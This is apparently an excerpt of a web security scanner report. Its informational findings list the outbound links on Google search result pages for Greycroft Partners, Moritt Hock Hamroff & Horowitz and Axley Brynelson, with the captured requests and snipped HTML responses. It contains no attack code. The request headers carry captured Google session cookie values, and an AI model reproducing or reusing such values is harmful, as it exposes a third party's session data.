http://webcache.googleusercontent.com/search?q=cache:nLI5bIapr74J:venturebeat.com/company/greycroft-partners/+Greycroft+Partners&cd=11&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:wQy1QCR12cUJ:www.crunchbase.com/financial-organization/greycroft-partners+Greycroft+Partners&cd=5&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com
http://www.crunchbase.com/financial-organization/greycroft-partners
http://www.dfjgotham.com/
http://www.firstround.com/
http://www.greycroftpartners.com/
http://www.greycroftpartners.com/about-us/
http://www.greycroftpartners.com/inquiries/
http://www.greycroftpartners.com/portfolio/
http://www.greycroftpartners.com/team/
http://www.grpvc.com/
http://www.pehub.com/104508/venrock-hires-marissa-campise-from-greycroft-partners/
http://www.villageventures.com/
http://www.youtube.com/results?q=Greycroft+Partners&oe=utf-8&rls=org.mozilla:en-US:official&client=firefox-a&um=1&ie=UTF-8&sa=N&hl=en&tab=w1

Request

GET /search?q=Greycroft+Partners&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a HTTP/1.1
Host: www.google.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: PREF=ID=a84248b084119e14:U=0e01645f8124d18b:FF=0:TM=1297097718:LM=1297260472:S=nEXcDanFJNlg7e6-; NID=46=puLppwL3bB196Rud7yQxjUIEbHLGwJ9Rc7Xs5MWyEcqpZSupt4unMhj2JdvVMNmEh4RSk4f0iUu7DARpsHmblQuQ24wqR5fGdUA7EvpCPXUw0wJJOqZPn_sAMK7Ryr9g

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:28:25 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Content-Length: 74073

<!doctype html> <head> <title>Greycroft Partners - Google Search</title> <script>window.google={kEI:"WcTLTfuREomdgQeoo9jwBQ",kEXPI:"17259,23756,24692,24878,24879,27400,28164,28505,29229,29685,2
...[SNIP]...
</div><a id=gb_36 href="http://www.youtube.com/results?q=Greycroft+Partners&oe=utf-8&rls=org.mozilla:en-US:official&client=firefox-a&um=1&ie=UTF-8&sa=N&hl=en&tab=w1" onclick=gbar.qs(this) class=gb2>YouTube</a>
...[SNIP]...
<h3 class="r"><a href="http://www.greycroftpartners.com/" class=l onmousedown="return clk(this.href,'','','','1','','0CB4QFjAA')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:IYPI2DJeKdIJ:www.greycroftpartners.com/+Greycroft+Partners&cd=1&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com" onmousedown="return clk(this.href,'','','','1','','0CCMQIDAA')">Cached</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.greycroftpartners.com/team/" onmousedown="return clk(this.href,'','','','1','','0CCUQqwMoADAA')">Team</a></div><div class=sld><a class=sla href="http://www.greycroftpartners.com/portfolio/" onmousedown="return clk(this.href,'','','','1','','0CCYQqwMoATAA')">Portfolio</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.greycroftpartners.com/about-us/" onmousedown="return clk(this.href,'','','','1','','0CCcQqwMoAjAA')">About Us</a></div><div class=sld><a class=sla href="http://www.greycroftpartners.com/inquiries/" onmousedown="return clk(this.href,'','','','1','','0CCgQqwMoAzAA')">Inquiries</a>
...[SNIP]...
<h3 class="r"><a href="http://www.greycroftpartners.com/team/" class=l onmousedown="return clk(this.href,'','','','2','','0CCsQFjAB')">Team | <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:EQrpsqXYsLAJ:www.greycroftpartners.com/team/+Greycroft+Partners&cd=2&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com" onmousedown="return clk(this.href,'','','','2','','0CDAQIDAB')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.greycroftpartners.com/portfolio/" class=l onmousedown="return clk(this.href,'','','','3','','0CDIQFjAC')">Portfolio | <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:Ga248CHgYkcJ:www.greycroftpartners.com/portfolio/+Greycroft+Partners&cd=3&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com" onmousedown="return clk(this.href,'','','','3','','0CDcQIDAC')">Cached</a>
...[SNIP]...
<span class=tl><a href="http://finance.fortune.cnn.com/2011/05/05/why-marissa-campise-left-greycroft-for-venrock/" class=l onmousedown="return clk(this.href,'','','','4','','0CDoQqQIwAw')">Why Marissa Campise left <em>
...[SNIP]...
<h3 class="r"><a href="http://www.crunchbase.com/financial-organization/greycroft-partners" class=l onmousedown="return clk(this.href,'','','','5','','0CEMQFjAE')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:wQy1QCR12cUJ:www.crunchbase.com/financial-organization/greycroft-partners+Greycroft+Partners&cd=5&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com" onmousedown="return clk(this.href,'','','','5','','0CEoQIDAE')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://en.wikipedia.org/wiki/Greycroft_Partners" class=l onmousedown="return clk(this.href,'','','','6','','0CEwQFjAF')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:dM5kWDxYTXwJ:en.wikipedia.org/wiki/Greycroft_Partners+Greycroft+Partners&cd=6&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com" onmousedown="return clk(this.href,'','','','6','','0CFEQIDAF')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://angelsoft.net/venture-fund/greycroft-partners" class=l onmousedown="return clk(this.href,'','','','7','','0CFMQFjAG')">Venture Fund | <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:XtckvHYojcAJ:angelsoft.net/venture-fund/greycroft-partners+Greycroft+Partners&cd=7&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com" onmousedown="return clk(this.href,'','','','7','','0CFgQIDAG')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.pehub.com/104508/venrock-hires-marissa-campise-from-greycroft-partners/" class=l onmousedown="return clk(this.href,'','','','8','','0CFkQFjAH')">peHUB .. Venrock Hires Marissa Campise from <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:SIvtMGHuSKUJ:www.pehub.com/104508/venrock-hires-marissa-campise-from-greycroft-partners/+Greycroft+Partners&cd=8&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com" onmousedown="return clk(this.href,'','','','8','','0CF4QIDAH')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://dealbook.nytimes.com/tag/greycroft-partners/" class=l onmousedown="return clk(this.href,'','','','9','','0CF8QFjAI')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:0pQsy49O790J:dealbook.nytimes.com/tag/greycroft-partners/+Greycroft+Partners&cd=9&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com" onmousedown="return clk(this.href,'','','','9','','0CGQQIDAI')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://boston.citybizlist.com/7/2011/5/5/Venrock-Compromises-Marissa-Campise-from-Greycroft-Partners.aspx" class=l onmousedown="return clk(this.href,'','','','10','','0CGUQFjAJ')">Venrock Compromises Marissa Campise from <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:XDIzLXrrrloJ:boston.citybizlist.com/7/2011/5/5/Venrock-Compromises-Marissa-Campise-from-Greycroft-Partners.aspx+Greycroft+Partners&cd=10&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com" onmousedown="return clk(this.href,'','','','10','','0CGoQIDAJ')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://venturebeat.com/company/greycroft-partners/" class=l onmousedown="return clk(this.href,'','','','11','','0CGsQFjAK')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:nLI5bIapr74J:venturebeat.com/company/greycroft-partners/+Greycroft+Partners&cd=11&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com" onmousedown="return clk(this.href,'','','','11','','0CHAQIDAK')">Cached</a>
...[SNIP]...
<div><a href="http://www.firstround.com/" class=l onmousedown="return clk(this.href,'','','','12','','0CHMQoggwCw')">First Round Capital</a>
...[SNIP]...
<div><a href="http://www.grpvc.com/" class=l onmousedown="return clk(this.href,'','','','13','','0CHUQoggwDA')">GRP Partners</a>
...[SNIP]...
<div><a href="http://www.villageventures.com/" class=l onmousedown="return clk(this.href,'','','','14','','0CHcQoggwDQ')">Village Ventures</a>
...[SNIP]...
<div><a href="http://www.dfjgotham.com/" class=l onmousedown="return clk(this.href,'','','','15','','0CHkQoggwDg')">DFJ Gotham Ventures</a>
...[SNIP]...

19.46. http://www.google.com/search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/search

Issue detail

The page was loaded from a URL containing a query string:

http://www.google.com/search?q=Moritt+Hock+Hamroff+%26+Horowitz&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a

The response contains the following links to other domains:

http://amlawdaily.typepad.com/files/dial-a-mattress-creditors-list.pdf
http://longisland.citysearch.com/profile/7450958/garden_city_ny/moritt_hock_hamroff_horowitz.html
http://webcache.googleusercontent.com/search?q=cache:9QN2DVZT1usJ:www.moritthock.com/index.php/attorneys/attorney/lee_j._mendelson+Moritt+Hock+Hamroff+%26+Horowitz&cd=2&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:Gy_RLzwBAbUJ:www.superpages.com/bp/Garden-City-NY/Moritt-Hock-Hamroff-Horowitz-L2063224208.htm+Moritt+Hock+Hamroff+%26+Horowitz&cd=8&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:M6MmErtfvKUJ:www.elfaonline.org/pub/news/indnews/news_report.cfm%3Fid%3D13246+Moritt+Hock+Hamroff+%26+Horowitz&cd=5&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:Ntr2QOukmNQJ:www.manta.com/c/mms87sh/moritt-hock-hamroff-horowitz+Moritt+Hock+Hamroff+%26+Horowitz&cd=7&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:jmw5bn-l7JoJ:longisland.citysearch.com/profile/7450958/garden_city_ny/moritt_hock_hamroff_horowitz.html+Moritt+Hock+Hamroff+%26+Horowitz&cd=9&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:s2GPkndCJ-kJ:www.moritthock.com/index.php/attorneys/attorney/henry_e._klosowski+Moritt+Hock+Hamroff+%26+Horowitz&cd=3&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:uHOA1UiydKsJ:www.moritthock.com/+Moritt+Hock+Hamroff+%26+Horowitz&cd=1&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:zsvVWB0WlWwJ:www.letipli.com/member_details.asp%3Fmember_id%3D405+Moritt+Hock+Hamroff+%26+Horowitz&cd=10&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com
http://www.elfaonline.org/pub/news/indnews/news_report.cfm?id=13246
http://www.lawyers.com/New-York/Garden-City/Moritt-Hock-Hamroff-and-Horowitz-LLP-417972-f.html
http://www.letipli.com/member_details.asp?member_id=405
http://www.manta.com/c/mms87sh/moritt-hock-hamroff-horowitz
http://www.moritthock.com/
http://www.moritthock.com/index.php/attorneys/attorney/henry_e._klosowski
http://www.moritthock.com/index.php/attorneys/attorney/lee_j._mendelson
http://www.superpages.com/bp/Garden-City-NY/Moritt-Hock-Hamroff-Horowitz-L2063224208.htm
http://www.youtube.com/results?q=Moritt+Hock+Hamroff+%26+Horowitz&oe=utf-8&rls=org.mozilla:en-US:official&client=firefox-a&um=1&ie=UTF-8&sa=N&hl=en&tab=w1

Request

GET /search?q=Moritt+Hock+Hamroff+%26+Horowitz&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a HTTP/1.1
Host: www.google.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: PREF=ID=a84248b084119e14:U=0e01645f8124d18b:FF=0:TM=1297097718:LM=1297260472:S=nEXcDanFJNlg7e6-; NID=46=Kh16oMYjJ3i3M9ZKS5-Uc5ayK3FUI9_l7bNoXIqZCInKPUiI535abnnz71YLg2JxJAatb0xLnt91XRSe8ggj3yrqv3a9JAg-PawaBwsLEw2CfhkOasVNgrLJ9ixYklzJ

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:20:44 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Content-Length: 69948

<!doctype html> <head> <title>Moritt Hock Hamroff & Horowitz - Google Search</title> <script>window.google={kEI:"nNDLTdDQI4jL0QHw1-z6Bg",kEXPI:"17259,23756,24692,24878,24879,27400,28164,285
...[SNIP]...
</div><a id=gb_36 href="http://www.youtube.com/results?q=Moritt+Hock+Hamroff+%26+Horowitz&oe=utf-8&rls=org.mozilla:en-US:official&client=firefox-a&um=1&ie=UTF-8&sa=N&hl=en&tab=w1" onclick=gbar.qs(this) class=gb2>YouTube</a>
...[SNIP]...
<h3 class="r"><a href="http://www.moritthock.com/" class=l onmousedown="return clk(this.href,'','','','1','','0CBYQFjAA')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:uHOA1UiydKsJ:www.moritthock.com/+Moritt+Hock+Hamroff+%26+Horowitz&cd=1&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:uHOA1UiydKsJ:www.moritthock.com/+Moritt+Hock+Hamroff+%26+Horowitz&cd=1&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','1','','0CBsQIDAA')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.moritthock.com/index.php/attorneys/attorney/lee_j._mendelson" class=l onmousedown="return clk(this.href,'','','','2','','0CB0QFjAB')">Lee J. Mendelson | <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:9QN2DVZT1usJ:www.moritthock.com/index.php/attorneys/attorney/lee_j._mendelson+Moritt+Hock+Hamroff+%26+Horowitz&cd=2&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:9QN2DVZT1usJ:www.moritthock.com/index.php/attorneys/attorney/lee_j._mendelson+Moritt+Hock+Hamroff+%26+Horowitz&cd=2&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','2','','0CCIQIDAB')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.moritthock.com/index.php/attorneys/attorney/henry_e._klosowski" class=l onmousedown="return clk(this.href,'','','','3','','0CCMQFjAC')">Henry E. Klosowski | <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:s2GPkndCJ-kJ:www.moritthock.com/index.php/attorneys/attorney/henry_e._klosowski+Moritt+Hock+Hamroff+%26+Horowitz&cd=3&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:s2GPkndCJ-kJ:www.moritthock.com/index.php/attorneys/attorney/henry_e._klosowski+Moritt+Hock+Hamroff+%26+Horowitz&cd=3&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','3','','0CCgQIDAC')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.lawyers.com/New-York/Garden-City/Moritt-Hock-Hamroff-and-Horowitz-LLP-417972-f.html" class=l onmousedown="return clk(this.href,'','','','4','','0CCoQFjAD')"><em>
...[SNIP]...
<h3 class="r"><a href="http://www.elfaonline.org/pub/news/indnews/news_report.cfm?id=13246" class=l onmousedown="return clk(this.href,'','','','5','','0CDIQFjAE')">ELFA | <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:M6MmErtfvKUJ:www.elfaonline.org/pub/news/indnews/news_report.cfm%3Fid%3D13246+Moritt+Hock+Hamroff+%26+Horowitz&cd=5&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:M6MmErtfvKUJ:www.elfaonline.org/pub/news/indnews/news_report.cfm%3Fid%3D13246+Moritt+Hock+Hamroff+%26+Horowitz&cd=5&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','5','','0CDcQIDAE')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://amlawdaily.typepad.com/files/dial-a-mattress-creditors-list.pdf" class=l onmousedown="return clk(this.href,'','','','6','','0CDgQFjAF')"><em>
...[SNIP]...
<h3 class="r"><a href="http://www.manta.com/c/mms87sh/moritt-hock-hamroff-horowitz" class=l onmousedown="return clk(this.href,'','','','7','','0CD4QFjAG')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:Ntr2QOukmNQJ:www.manta.com/c/mms87sh/moritt-hock-hamroff-horowitz+Moritt+Hock+Hamroff+%26+Horowitz&cd=7&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:Ntr2QOukmNQJ:www.manta.com/c/mms87sh/moritt-hock-hamroff-horowitz+Moritt+Hock+Hamroff+%26+Horowitz&cd=7&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','7','','0CEMQIDAG')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.superpages.com/bp/Garden-City-NY/Moritt-Hock-Hamroff-Horowitz-L2063224208.htm" class=l onmousedown="return clk(this.href,'','','','8','','0CEUQFjAH')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:Gy_RLzwBAbUJ:www.superpages.com/bp/Garden-City-NY/Moritt-Hock-Hamroff-Horowitz-L2063224208.htm+Moritt+Hock+Hamroff+%26+Horowitz&cd=8&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:Gy_RLzwBAbUJ:www.superpages.com/bp/Garden-City-NY/Moritt-Hock-Hamroff-Horowitz-L2063224208.htm+Moritt+Hock+Hamroff+%26+Horowitz&cd=8&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','8','','0CEoQIDAH')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://longisland.citysearch.com/profile/7450958/garden_city_ny/moritt_hock_hamroff_horowitz.html" class=l onmousedown="return clk(this.href,'','','','9','','0CEsQFjAI')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:jmw5bn-l7JoJ:longisland.citysearch.com/profile/7450958/garden_city_ny/moritt_hock_hamroff_horowitz.html+Moritt+Hock+Hamroff+%26+Horowitz&cd=9&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:jmw5bn-l7JoJ:longisland.citysearch.com/profile/7450958/garden_city_ny/moritt_hock_hamroff_horowitz.html+Moritt+Hock+Hamroff+%26+Horowitz&cd=9&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','9','','0CFAQIDAI')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.letipli.com/member_details.asp?member_id=405" class=l onmousedown="return clk(this.href,'','','','10','','0CFEQFjAJ')">Attorney Estate Planning - Henry Klosowski - <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:zsvVWB0WlWwJ:www.letipli.com/member_details.asp%3Fmember_id%3D405+Moritt+Hock+Hamroff+%26+Horowitz&cd=10&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:zsvVWB0WlWwJ:www.letipli.com/member_details.asp%3Fmember_id%3D405+Moritt+Hock+Hamroff+%26+Horowitz&cd=10&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com','','','','10','','0CFYQIDAJ')">Cached</a>
...[SNIP]...

19.47. http://www.google.com/search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/search

Issue detail

The page was loaded from a URL containing a query string:

http://www.google.com/search?q=Axley+Brynelson&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a

The response contains the following links to other domains:

http://axley.com/
http://en.wikipedia.org/wiki/Axley_Brynelson,_LLP
http://t1.gstatic.com/images?q=tbn:ANd9GcTsGFm0VxfWYfu7a2wqMbDfTJWfvlUnGUQPvOmWGcz4g6aY9w
http://twitter.com/AxleyLawFirm
http://webcache.googleusercontent.com/search?q=cache:5VrC-trogTMJ:www.linkedin.com/company/axley-brynelson-llp+Axley+Brynelson&cd=11&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:ATKjPjX5ntYJ:www.axley.com/contact+Axley+Brynelson&cd=4&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:W7Frg8Z3jvMJ:www.yelp.com/biz/axley-brynelson-law-firm-madison+Axley+Brynelson&cd=12&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:aWGIU1PTABIJ:en.wikipedia.org/wiki/Axley_Brynelson,_LLP+Axley+Brynelson&cd=5&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:dEN4MAibkhIJ:www.wenportal.org/Resources/Oneononeassistance/BusinessAssistanceProgram/AxleyBrynelsonLLP.htm+Axley+Brynelson&cd=10&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:hCMTY3udHEMJ:www.axley.com/attorneys+Axley+Brynelson&cd=3&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:nI3HDDVQL68J:axley.com/+Axley+Brynelson&cd=1&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:q3RymXkTLwIJ:www.facebook.com/pages/Axley-Brynelson-LLP/100335213355063+Axley+Brynelson&cd=7&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:x_s7oVmlWC4J:www.lawyers.com/Wisconsin/Madison/Axley-Brynelson,-LLP-1793563-f.html+Axley+Brynelson&cd=6&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:y2e7CDn4HM0J:twitter.com/AxleyLawFirm+Axley+Brynelson&cd=8&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com
http://www.axley.com/attorneys
http://www.axley.com/bicycle-accidents
http://www.axley.com/bwfw
http://www.axley.com/careers
http://www.axley.com/contact
http://www.axley.com/personal-injury
http://www.axley.com/services
http://www.axley.com/videos
http://www.facebook.com/pages/Axley-Brynelson-LLP/100335213355063
http://www.lawyers.com/Wisconsin/Madison/Axley-Brynelson,-LLP-1793563-f.html
http://www.linkedin.com/company/axley-brynelson-llp
http://www.wenportal.org/Resources/Oneononeassistance/BusinessAssistanceProgram/AxleyBrynelsonLLP.htm
http://www.yelp.com/biz/axley-brynelson-law-firm-madison
http://www.youtube.com/results?q=Axley+Brynelson&oe=utf-8&rls=org.mozilla:en-US:official&client=firefox-a&um=1&ie=UTF-8&sa=N&hl=en&tab=w1

Request

GET /search?q=Axley+Brynelson&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a HTTP/1.1
Host: www.google.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: PREF=ID=a84248b084119e14:U=0e01645f8124d18b:FF=0:TM=1297097718:LM=1297260472:S=nEXcDanFJNlg7e6-; NID=46=Kh16oMYjJ3i3M9ZKS5-Uc5ayK3FUI9_l7bNoXIqZCInKPUiI535abnnz71YLg2JxJAatb0xLnt91XRSe8ggj3yrqv3a9JAg-PawaBwsLEw2CfhkOasVNgrLJ9ixYklzJ

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:15:59 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Content-Length: 74320

<!doctype html> <head> <title>Axley Brynelson - Google Search</title> <script>window.google={kEI:"f8_LTbGsApOD0QHVid30Bg",kEXPI:"17259,23756,24692,24878,24879,27400,28164,28505,29229,29685,2979
...[SNIP]...
</div><a id=gb_36 href="http://www.youtube.com/results?q=Axley+Brynelson&oe=utf-8&rls=org.mozilla:en-US:official&client=firefox-a&um=1&ie=UTF-8&sa=N&hl=en&tab=w1" onclick=gbar.qs(this) class=gb2>YouTube</a>
...[SNIP]...
<h3 class="r"><a href="http://axley.com/" class=l onmousedown="return clk(this.href,'','','','1','','0CBYQFjAA')">Madison Wisconsin Law Firm: <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:nI3HDDVQL68J:axley.com/+Axley+Brynelson&cd=1&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com" onmousedown="return clk(this.href,'','','','1','','0CBsQIDAA')">Cached</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.axley.com/attorneys" onmousedown="return clk(this.href,'','','','1','','0CBwQqwMoADAA')">Attorneys</a></div><div class=sld><a class=sla href="http://www.axley.com/contact" onmousedown="return clk(this.href,'','','','1','','0CB0QqwMoATAA')">Contact Us</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.axley.com/careers" onmousedown="return clk(this.href,'','','','1','','0CB4QqwMoAjAA')">Careers</a></div><div class=sld><a class=sla href="http://www.axley.com/bwfw" onmousedown="return clk(this.href,'','','','1','','0CB8QqwMoAzAA')">By Women For Women</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.axley.com/services" onmousedown="return clk(this.href,'','','','1','','0CCAQqwMoBDAA')">Services</a></div><div class=sld><a class=sla href="http://www.axley.com/personal-injury" onmousedown="return clk(this.href,'','','','1','','0CCEQqwMoBTAA')">Personal Injury</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.axley.com/bicycle-accidents" onmousedown="return clk(this.href,'','','','1','','0CCIQqwMoBjAA')">Bicycle Accident Injury Team</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.axley.com/videos" onmousedown="return clk(this.href,'','','','1','','0CCMQqwMoBzAA')">Videos</a>
...[SNIP]...
<h3 class="r"><a href="http://www.axley.com/attorneys" class=l onmousedown="return clk(this.href,'','','','3','','0CC0QFjAC')">Attorneys: <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:hCMTY3udHEMJ:www.axley.com/attorneys+Axley+Brynelson&cd=3&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com" onmousedown="return clk(this.href,'','','','3','','0CDIQIDAC')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.axley.com/contact" class=l onmousedown="return clk(this.href,'','','','4','','0CDQQFjAD')">Contact Us: <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:ATKjPjX5ntYJ:www.axley.com/contact+Axley+Brynelson&cd=4&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com" onmousedown="return clk(this.href,'','','','4','','0CDkQIDAD')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://en.wikipedia.org/wiki/Axley_Brynelson,_LLP" class=l onmousedown="return clk(this.href,'','','','5','','0CDwQFjAE')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:aWGIU1PTABIJ:en.wikipedia.org/wiki/Axley_Brynelson,_LLP+Axley+Brynelson&cd=5&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com" onmousedown="return clk(this.href,'','','','5','','0CEEQIDAE')">Cached</a>
...[SNIP]...
